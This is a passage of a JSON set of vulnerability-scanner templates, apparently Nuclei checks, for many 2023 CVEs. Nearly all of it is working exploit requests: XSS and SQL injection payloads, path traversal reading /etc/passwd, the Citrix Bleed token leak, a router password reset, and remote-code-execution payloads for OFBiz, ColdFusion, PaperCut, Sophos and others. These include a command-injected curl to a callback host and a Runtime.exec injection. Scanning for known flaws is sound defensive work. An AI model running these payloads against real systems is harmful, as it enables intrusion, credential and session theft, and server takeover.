/api/hassio_ingress/.%09./supervisor/info HTTP/1.1 # Mitigation bypass 2\nHost: {{Hostname}}\nX-Hass-Is-Admin:1\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["\"slug\":","\"name\":","\"ip_address\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-44012","info":{"name":"mojoPortal v.2.7.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Help.aspx?helpkey=xxxxxxx'><svg/onload=alert()+x="],"matchers":[{"type":"dsl","dsl":["contains_any(body, \"mojoPortal\", \"mojo-accordion\", \"mojo-tabs\")","contains(body, \"><svg/onload=alert()\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-24367","info":{"name":"Temenos T24 R20 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsps/genrequest.jsp?routineName=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","<title>Processing...</title>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2252","info":{"name":"Directorist < 7.5.4 - Local File Inclusion","severity":"low"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=at_biz_dir&page=tools&step=2&file=%2Fetc%2Fpasswd&delimiter=%3B HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-37462","info":{"name":"XWiki Platform - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view","{{BaseURL}}/asyncrenderer/{{url}}?clientId={{id}}&timeout=500&wiki=xwiki"],"skip-variables-check":true,"extractors":[{"type":"regex","group":1,"name":"id","regex":["data-xwiki-async-client-id=\"(.+?)\""],"internal":true},{"type":"regex","group":1,"name":"url","regex":["<span class=\"xwiki-async\" data-xwiki-async-id=\"(.+?)\""],"internal":true}],"matchers":[{"type":"dsl","dsl":["body_2 == \"31557644536232\"","contains(header_2, \"text/html\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-49070","info":{"name":"Apache OFBiz < 18.12.10 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?>\n  <methodCall>\n    <methodName>{{randstr}}</methodName>\n    <params>\n      <param>\n      <value>\n        <struct>\n       <member>\n          <name>test</name>\n          <value>\n      <serializable xmlns=\"http://ws.apache.org/xmlrpc/namespaces/extensions\">{{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")}}</serializable>\n          </value>\n        </member>\n      </struct>\n      </value>\n    </param>\n    </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["<name>faultString</name>"]}]}]},{"id":"CVE-2023-0630","info":{"name":"Slimstat Analytics < 4.9.3.3 Subscriber - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=parse-media-shortcode&shortcode=[slimstat f=\"count\" w=\"author\"]WHERE:1 UNION SELECT sleep(7)-- a[/slimstat]\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 200","contains(content_type_2, \"application/json\")","contains(body_2, \"audioShortcodeLibrary\")"],"condition":"and"}]}]},{"id":"CVE-2023-2309","info":{"name":"wpForo Forum <= 2.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /community/main-forum/?param=%3Cscript%3Ealert(/document.domain/)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"<script>alert(/document.domain/)</script>\",\"wpforo\")","contains(header,\"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-41642","info":{"name":"RealGimm by GruppoSCAI v1.1.37p38 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /RealGimmWeb/Pages/Sistema/LogObjectTrace.aspx HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: </span><script>alert(document.domain)</script>\n\n__EVENTTARGET=T1bPulsantiera&EVENTARGUMENT=TlbPulsantiera_Item_0%3AUP&___VIEWSTATE='TESTING&LeftArea%3ALeftMenu_hidden=&T1bPulsantiera_CancelClick=false&TlbPulsantiera_hidden=&cbUtente=&txtDataRichiestaDa=&txtDataRichiestaA=&TopArea%3ATopMenu=\n","GET /RealGimmWeb/Pages/ErroreNonGestito.aspx HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: </span><script>alert(document.domain)</script>\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<script>alert(document.domain)</script>","Invalid_Viewstate"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]}]}]},{"id":"CVE-2023-6380","info":{"name":"OpenCms 14 & 15 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/modules/alkacon.mercury.template.jsondemo/elements/jsonapi.jsp?content&fallbackLocale&locale=en&rows=1&uri=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2023-5991","info":{"name":"Hotel Booking Lite < 4.8.5 - Arbitrary File Download & Deletion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?filename=../../../../../../etc/passwd&mphb_action=download"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["filename=","/etc/passwd"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-46732","info":{"name":"XWiki < 14.10.14 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/view/Main/?rev=xar%3Aorg.xwiki.platform%3Axwiki-platform-distribution-flavor-common%2F15.5%25%25%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e","{{BaseURL}}/xwiki/bin/view/Main/?rev=xar%3Aorg.xwiki.platform%3Axwiki-platform-distribution-flavor-common%2F15.5%25%25%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains(body, \"<script>alert(document.domain)</script>\\\" id=\\\"tmViewSource\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-47211","info":{"name":"ManageEngine OpManager - Directory Traversal","severity":"high"},"requests":[{"raw":["POST /two_factor_auth HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nj_username={{username}}&j_password={{password}}\n","POST /client/api/json/mibbrowser/uploadMib HTTP/1.1\nHost: {{Hostname}}\nX-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}\nContent-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262\n\n-----------------------------372334936941313273904263503262\nContent-Disposition: form-data; name=\"mibFile\"; filename=\"karas.txt\"\nContent-Type: text/plain\n\n../images/karas DEFINITIONS ::= BEGIN\n\n\nIMPORTS\n    enterprises\n        FROM RFC1155-SMI;\n\nmicrosoft       OBJECT IDENTIFIER ::= { enterprises 311 }\nsoftware        OBJECT IDENTIFIER ::= { microsoft 1 }\nsystems         OBJECT IDENTIFIER ::= { software 1 }\nos              OBJECT IDENTIFIER ::= { systems 3 }\nwindowsNT       OBJECT IDENTIFIER ::= { os 1 }\nwindows         OBJECT IDENTIFIER ::= { os 2 }\nworkstation     OBJECT IDENTIFIER ::= { windowsNT 1 }\nserver          OBJECT IDENTIFIER ::= { windowsNT 2 }\ndc              OBJECT IDENTIFIER ::= { windowsNT 3 }\n\nEND\n\n-----------------------------372334936941313273904263503262--\n","POST /client/api/json/mibbrowser/uploadMib HTTP/1.1\nHost: {{Hostname}}\nX-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}\nContent-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262\n\n-----------------------------372334936941313273904263503262\nContent-Disposition: form-data; name=\"mibFile\"; filename=\"karas.txt\"\nContent-Type: text/plain\n\n../images/karas DEFINITIONS ::= BEGIN\n\n\nIMPORTS\n    enterprises\n        FROM RFC1155-SMI;\n\nmicrosoft       OBJECT IDENTIFIER ::= { enterprises 311 }\nsoftware        OBJECT IDENTIFIER ::= { microsoft 1 }\nsystems         OBJECT IDENTIFIER ::= { software 1 }\nos              OBJECT IDENTIFIER ::= { systems 3 }\nwindowsNT       OBJECT IDENTIFIER ::= { os 1 }\nwindows         OBJECT IDENTIFIER ::= { os 2 }\nworkstation     OBJECT IDENTIFIER ::= { windowsNT 1 }\nserver          OBJECT IDENTIFIER ::= { windowsNT 2 }\ndc              OBJECT IDENTIFIER ::= { windowsNT 3 }\n\nEND\n\n-----------------------------372334936941313273904263503262--\n"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"application/json\")","contains(body, \"MIBFile with same name already exists\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"x_zcsrf_token","group":1,"part":"header","regex":["Set-Cookie: opmcsrfcookie=([^;]{50,})"],"internal":true}]}]},{"id":"CVE-2023-38203","info":{"name":"Adobe ColdFusion - Deserialization of Untrusted Data","severity":"critical"},"requests":[{"raw":["POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version%3d'1.0'><header/><data><struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'><var+name%3d'dataSourceName'><string>{{jndi}}</string></var><var+name%3d'autoCommit'><boolean+value%3d'true'/></var></struct></data></wddxPacket>\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(body, \"ColdFusion documentation\")"],"condition":"and"}]}]},{"id":"CVE-2023-4169","info":{"name":"Ruijie RG-EW1200G Router - Password Reset","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/sys/set_passwd"],"body":"{\n\"username\":\"web\",\n\"admin_new\":\"{{password}}\"\n}\n","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\":\"ok\""]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27179","info":{"name":"GDidees CMS v3.9.1 - Arbitrary File Download","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_admin/imgdownload.php?filename=imgdownload.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["$filename=$_GET[\"filename\"];","@readfile($filename) OR die();"],"condition":"and"},{"type":"word","part":"header","words":["application/force-download"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-41538","info":{"name":"PHPJabbers PHP Forum Script 3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created&direction=DESC&keyword=%22><script>alert(document.domain)</script>"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"New Question\", \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-1671","info":{"name":"Sophos Web Appliance - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php?c=blocked&action=continue HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargs_reason=filetypewarn&url={{randstr}}&filetype={{randstr}}&user={{randstr}}&user_encoded={{base64(\"\\';curl http://{{interactsh-url}} #\")}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2023-3843","info":{"name":"mooDating 1.2 - Cross-site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/matchmakings/questiontmili%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ew71ch?number="],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains(body, \"><img src=a onerror=alert(document.domain)>w71ch\") && contains(body, \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-45542","info":{"name":"MooSocial 3.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/index/?q=test%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3etest"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"<script>alert(document.domain)</script>\", \"mooSocial\")"],"condition":"and"}]}]},{"id":"CVE-2023-42343","info":{"name":"OpenCMS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/opencms/cmisatom/cmis-online/type?id=1%27\"><svg%20onload=alert(document.domain)>"],"headers":{"Content-Type":"application/cmisquery+xml"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Apache Chemistry OpenCMIS","<svg onload=alert(document.domain)>"],"condition":"and"}]}]},{"id":"CVE-2023-39361","info":{"name":"Cacti 1.2.24 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=%22or+%22%22%3D%22%28%28%22%29%29%3BSELECT+SLEEP%2810%29%3B--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=10","status_code == 200","contains_all(body, \"Tree Mode\", \"cacti\")"],"condition":"and"}]}]},{"id":"CVE-2023-4966","info":{"name":"Citrix Bleed - Leaking Session Tokens","severity":"high"},"requests":[{"raw":["GET /oauth/idp/.well-known/openid-configuration HTTP/1.1\n{{str}}: {{Hostname}}\nHost: {{payload}}\n\n","POST /logon/LogonPoint/Authentication/GetUserName HTTP/1.1\nHost: {{Hostname}}\nCookie: NSC_AAAC={{session}}\n\n"],"unsafe":true,"extractors":[{"type":"regex","name":"session","part":"body_1","group":1,"regex":["([a-f0-9]{100}45525d5f4f58455e445a4a42)"],"internal":true},{"type":"regex","part":"body_2","regex":["([a-z0-9._]+)"]}],"matchers-condition":"and","matchers":[{"type":"word","words":["NSC_AAAC=","HTTP/1.1"]},{"type":"word","words":["{\"issuer\":"]}]}]},{"id":"CVE-2023-47117","info":{"name":"Label Studio - Sensitive Information Exposure","severity":"high"},"requests":[{"raw":["GET /user/login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login/?next=/projects/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrfmiddlewaretoken={{csrf}}&email={{username}}&password={{password}}&persist_session=on\n","PATCH /api/dm/views/{{Task_id}}?interaction=filter&project={{Project_id}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\":{{Task_id}},\"data\":{\"title\":\"Tasks\",\"ordering\":[],\"type\":\"list\",\"target\":\"tasks\",\"filters\":{\"conjunction\":\"or\",\"items\":[{\"filter\":\"filter:tasks:updated_by__active_organization__active_users__password\",\"operator\":\"regex\",\"value\":\"^pbkdf2_sha256\\\\$260000\\\\$\",\"type\":\"String\"}]},\"hiddenColumns\":{\"explore\":[],\"labeling\":[]},\"columnsWidth\":{},\"columnsDisplayType\":{},\"gridWidth\":4,\"search_text\":null},\"project\":\"{{Project_id}}\"}\n","GET /api/tasks?page=1&page_size=30&view={{Task_id}}&interaction=filter&project={{Project_id}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_4, \"completed_at\", \"file_upload\", \"annotators\")","status_code_3==200 && status_code_4==200","contains(header_4, \"application/json\")"],"condition":"and"}],"extractors":[{"type":"regex","part":"body","name":"csrf","group":1,"regex":["me=\"csrfmiddlewaretoken\" value=\"([a-zA-Z0-9]+)\">"],"internal":true}]}]},{"id":"CVE-2023-34659","info":{"name":"JeecgBoot 3.5.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /jeecg-boot/jmreport/show HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"id\":\"961455b47c0b86dc961e90b5893bff05\",\"apiUrl\":\"\",\"params\":\"{\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(version())),1)) or '%%' like '\"}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["XPATH syntax error:","SQLException"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35843","info":{"name":"NocoDB version <= 0.106.1 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/{{repeat('..%2F', 5)}}etc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-20073","info":{"name":"Cisco VPN Routers - Unauthenticated Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /index.html HTTP/1.1\nHost: {{Hostname}}\n","POST /api/operations/ciscosb-file:form-file-upload HTTP/1.1\nHost: {{Hostname}}\nAuthorization: 1\nContent-Type: multipart/form-data; boundary=------------------------f6f99e26f3a45adf\n\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"pathparam\"\n\nPortal\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"fileparam\"\n\nindex.html\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"file.path\"\n\nindex.html\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"file\"; filename=\"index.html\"\nContent-Type: application/octet-stream\n\n{{index}}\n{{html_comment}}\n\n--------------------------f6f99e26f3a45adf--\n","GET /index.html HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"dsl","name":"index","internal":true,"dsl":["body_1"]}],"matchers":[{"type":"word","part":"body_3","words":["{{html_comment}}"]}]}]},{"id":"CVE-2023-27640","info":{"name":"PrestaShop tshirtecommerce - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/tshirtecommerce/fonts.php?name=2&type=./../index.php"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(base64_decode(body), \"PrestaShop\", \"<?php\")"],"condition":"and"}]}]},{"id":"CVE-2023-25194","info":{"name":"Apache Druid Kafka Connect - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /druid/indexer/v1/sampler?for=connect HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n    \"type\":\"kafka\",\n    \"spec\":{\n        \"type\":\"kafka\",\n        \"ioConfig\":{\n            \"type\":\"kafka\",\n            \"consumerProperties\":{\n                \"bootstrap.servers\":\"127.0.0.1:6666\",\n                \"sasl.mechanism\":\"SCRAM-SHA-256\",\n                \"security.protocol\":\"SASL_SSL\",\n                \"sasl.jaas.config\":\"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\\\"rmi://{{interactsh-url}}:6666/test\\\" useFirstPass=\\\"true\\\" serviceName=\\\"x\\\" debug=\\\"true\\\" group.provider.url=\\\"xxx\\\";\"\n            },\n            \"topic\":\"test\",\n            \"useEarliestOffset\":true,\n            \"inputFormat\":{\n                \"type\":\"regex\",\n                \"pattern\":\"([\\\\s\\\\S]*)\",\n                \"listDelimiter\":\"56616469-6de2-9da4-efb8-8f416e6e6965\",\n                \"columns\":[\n                    \"raw\"\n                ]\n            }\n        },\n        \"dataSchema\":{\n            \"dataSource\":\"sample\",\n            \"timestampSpec\":{\n                \"column\":\"!!!_no_such_column_!!!\",\n                \"missingValue\":\"1970-01-01T00:00:00Z\"\n            },\n            \"dimensionsSpec\":{\n\n            },\n            \"granularitySpec\":{\n                \"rollup\":false\n            }\n        },\n        \"tuningConfig\":{\n            \"type\":\"kafka\"\n        }\n    },\n    \"samplerConfig\":{\n        \"numRows\":500,\n        \"timeoutMs\":15000\n    }\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["RecordSupplier"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2023-4111","info":{"name":"PHPJabbers Bus Reservation System 1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0&session_id="],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"You have an error in your SQL syntax\", \"><script>alert(document.domain)</script>\")","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-49785","info":{"name":"ChatGPT-Next-Web - SSRF/XSS","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/cors/data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23","{{BaseURL}}/api/cors/http:%2f%2fnextchat.{{interactsh-url}}%23"],"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<script>alert(document.domain)</script>\")","contains(header_1, \"text/html\")"],"condition":"and"},{"type":"dsl","dsl":["contains(header_2,'X-Interactsh-Version')","contains(interactsh_protocol_2,'dns')"],"condition":"and"}]}]},{"id":"CVE-2023-34752","info":{"name":"bloofoxCMS v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","@timeout: 10s\nPOST /admin/index.php?mode=settings&page=lang&action=edit HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname=English&flag=en.gif&filename=english.php&date=m%2Fd%2FY&datetime=m%2Fd%2FY+-+H%3Ai&token=en&lid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","contains(header_2, \"text/html\")","contains(body_2, 'bloofoxCMS Admincenter')"],"condition":"and"}]}]},{"id":"CVE-2023-6977","info":{"name":"Mlflow <2.8.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\",\"source\":\"//proc/self/root\"}\n","GET /model-versions/get-artifact?name={{randstr}}&path=etc%2Fpasswd&version=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"word","part":"header_3","words":["filename=passwd","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0947","info":{"name":"Flatpress < 1.3 - Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/fp-content/","{{BaseURL}}/flatpress/fp-content/"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"<title>Index of /fp-content</title>\")"],"condition":"and"}]}]},{"id":"CVE-2023-27350","info":{"name":"PaperCut - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /app?service=page/SetupCompleted HTTP/1.1\nHost: {{Hostname}}\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FSetupCompleted%2F%24Form&sp=S0&Form0=%24Hidden%2CanalyticsEnabled%2C%24Submit&%24Hidden=true&%24Submit=Login\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=print-and-device.script.enabled&doQuickFind=Go\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240&%24TextField%240=Y&%24Submit=Update\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=print.script.sandboxed&doQuickFind=Go\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240&%24TextField%240=N&%24Submit=Update\n","GET /app?service=page/PrinterList HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=page%2FPrinterList\n","POST /app?service=direct/1/PrinterList/selectPrinter&sp={{printerID}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterList%2FselectPrinter&sp={{printerID}}\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterDetails%2FprinterOptionsTab.tab&sp=4\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterDetails%2F%24PrinterDetailsScript.%24Form&sp=S0&Form0=printerId%2CenablePrintScript%2CscriptBody%2C%24Submit%2C%24Submit%240%2C%24Submit%241&printerId={{printerID}}&enablePrintScript=on&scriptBody=function+printJobHook%28inputs%2C+actions%29+%7B%7D%0D%0Ajava.lang.Runtime.getRuntime%28%29.exec%28%27{{cmd}}%27%29%3B&%24Submit%241=Apply\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Avanceret kontering"]}],"extractors":[{"type":"regex","name":"printerID","group":1,"regex":["erList\\/selectPrinterCost&amp;sp=([a-z0-9]+)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-41266","info":{"name":"Qlik Sense Enterprise - Path Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/resources/qmc/fonts/../../../qrs/ReloadTask?xrfkey=1333333333333337&filter=.ttf"],"headers":{"Cookie":"X-Qlik-Session=13333333-3333-3333-3333-333333333337","X-Qlik-Xrfkey":"1333333333333337"},"matchers":[{"type":"dsl","dsl":["status_code == 400","contains(to_lower(set_cookie), 'x-qlik-session')","contains(body, 'The comparison expression does not consist of three elements')"],"condition":"and"}]}]},{"id":"CVE-2023-0669","info":{"name":"Fortra GoAnywhere MFT - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /goanywhere/lic/accept HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\n\nbundle={{concat(url_encode(base64(aes_cbc(base64_decode(generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")), base64_decode(\"Dmmjg5tuz0Vkm4YfSicXG2aHDJVnpBROuvPVL9xAZMo=\"), base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\")))), '$2')}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["GoAnywhere"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-24733","info":{"name":"PMB 7.4.6 - Cross-Site 